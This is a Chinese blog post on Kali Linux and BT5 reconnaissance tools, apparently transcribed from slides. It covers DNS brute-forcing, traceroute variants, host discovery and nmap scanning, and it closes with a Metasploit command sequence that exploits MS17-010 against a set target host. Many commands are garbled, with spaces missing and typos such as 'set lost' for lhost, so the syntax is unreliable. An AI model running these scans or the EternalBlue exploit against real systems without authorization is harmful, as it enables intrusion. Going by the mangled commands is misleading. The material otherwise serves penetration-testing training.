【无标题】

本文详细介绍了KaliLinux中用于DNS信息收集(dnsenum和dnsmap)、路由追踪(traceroute,tcptraceroute,tctrace)、主机发现(arping,fping,nbtscan,nping,protos)以及端口扫描(nmap)的命令使用方法。此外,还提及了操作系统指纹识别工具xprobe2和服务探测工具amap。
摘要由CSDN通过智能技术生成

Kali命令格式
dnsenum-enum baidu.com
dnsenum --dnsserver dns.baidu.com-f/usr/share/dnsenum/dns.txtbaidu.com
-f指定暴力破解字典文件;
--dnsserver,指定dns服务器;
baidu.com,为要查找的目标域

DNS信息收集--dnsenum(2)
BT5命令格式
路径:/pentest/enumeration/dns/dnsenum命令:./dnsenum.pl-fdns.txt --dnsserver192.168.2.2 test.com -o test.txt
-f,指定暴力破解字典文件--dnsserver,指定dns服务器test.com,为要查找的目标域

DNS信息收集--dnsmap(3)
。Kali命令格式
dnsmap test.com/usr/share/dnsmap/wordlist TLAs.txt-test.csv
baidu.com,为要查找的目标域。。-w wordlist_TLAs.txt,指定暴力破解文件
-cbaidu.csv,查询结果文件

DNS信息收集--dnsmap(2)
。BT5命令格式
路径:
/pentest/enumeration/dns/dnsmap命令:./dnsmap baidu.comWwordlist TLAs.txt -c baidu.csvbaidu.com,为要查找的目标域-w wordlist TLAs.txt,指定暴力破解文件,可以换成自定义的破解文件-cbaidu.csv,查询结果文件

路由信息收集--traceroute(2)
命令格式
traceroute www.baidu.com(BT5)
存在问题
一般情况下,无法成功到达目标机器。
防火墙会禁用traceroute
发送的是UDP数据包
目的端口是高端口(33434)
成功 目标机器返回Destination Unreachable(PortUnreachable)

路由信息收集--tcptraceroute(1)
实现原理
通过向80端口发送TCPSYN数据包来代替UDP或者ICMP应答数据包,tcptraceroute可以穿透大多数防火墙。
。BT5命令格式
tcptraceroutewww.baidu.com
成功
返回SYN/ACK,端口开放返回RST,端口关闭

路由信息收集tcptraceroute(2)
说明:
Kali将tcptraceroute工具集成到traceroute工具里面了,没有单独的tcptraceroute工具。。Kali命令格式
traceroute -Twww.baidu.com
-T表示使用TCP SYN 进行追踪(默认端口80)
成功
返回SYN/ACK,端口开放
返回RST,端口关闭

路由信息收集--tctrace
实现原理
与tcptraceroute类似。
命令格式
路径: /pentest/enumeration/irpasBT5命令:./tctrace -i ethl -d www.baidu.comKali命令:tctrace -i eth0 -d www.baidu.com
成功
返回SYN/ACK,端口开放返回RST.端口关闭

实验操作2--路由信息收集
·实验测试
Kali设置网卡为桥接,与外网连接,分别利用traceroute和tctrace命令收集到达www.baidu.com的路由信息。
利用两台机器将Kali与Windows Server 2003分别设置在两个局域网网段,并通过router进行联通,再利用Kali收集到达www.test.com的路由信息。

主机发现--arping
命令说明
对直连网络,使用ARPrequest进行测试,一个特定IP是否正在使用
命令格式
arping -c3 192.168.2.2。-c指定测试次数
缺限只能针对同一网段内的ip进行测试

主机发现--fping
命令说明
能快速地使用ICMPECHO一次请求多个主机
命令格式
fping -s-r1-g 192.168.2.1 192.168.2.20-s显示最终结果
-r测试次数
-g测试范围

主机发现--nbtscan
命令说明
扫描一个IP地址范围的NetBIOS名字信息,它将提供一个关于IP地址,NetBIOS计算机名,服务可用性,登录用户名和MAC地址的报告
命令格式
nbtscan 192.168.2.1-254
·局限:只能扫描微软的主机

主机发现!-nping
命令说明
nping工具允许用户产生各种网络数据包。(TCP、UDP、ICMP、ARP),也允许用户自定义协议头部,例如:源和目的,TCP和UDP的端口号
命令格式
nping-cl--tcp -p 80 --flags syn 192.168.2.2Pnping-cI--tcp -p 80 --flags ack 192.168.2.2Dnping-cl--udp -p 33434 192.168.2.2

主机发现--protos
命令说明
。主要用于扫描特定主机上所支持的协议。
命令格式
路径:/pentest/enumeration/irpasBT5命令:./protos -ieth0 -d 192.168.2.2 -vKali命令:protos -ieth0 -d 192.168.2.2 -v
。-i指定网络设备(ethn)。-d指定目标地址(IP或IP/MASK)
。-v显示详细信息

端口扫描--nmap(2)命令格式nmap 192.168.2.2//查看目标主机上开放的端口号nmap -p 1-1000 192.168.2.2//指定端口扫描范围
nmap -p 21 192.168.2.*/扫描特定端口

端口扫描--nmap(3)
命令格式
nmap -sn -v-n 192.168.2.0/24-sn 通过ICMP ECHO request做扫描-v显示详细信息
·-n不做dns解析(反向)
nmap -A 192.168.2.2
-A 综合性扫描

端口扫描--nmap(4)
命令格式。nmap -sV 192.168.2.2查看开放的端口上正在运行的服务

操作系统指纹--xprobe2
命令说明
一个主动的操作系统指纹监控工具。它采用模糊签名匹配,概率猜测,多相匹配,和签名数据库进行指纹识别
命令格式
xprobe2 192.168.2.2

服务探测--amap
命令说明
是一个用于检测特定端口上运行的具体应用的工具。
命令格式
amap -bg 192.168.2.2 80

service postgresql start

msfdb init

msfconsole

search ms17-010

info 1

use 1

show options

set rhosts 192.168.x.13

set lost 192.168.x.3

run

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值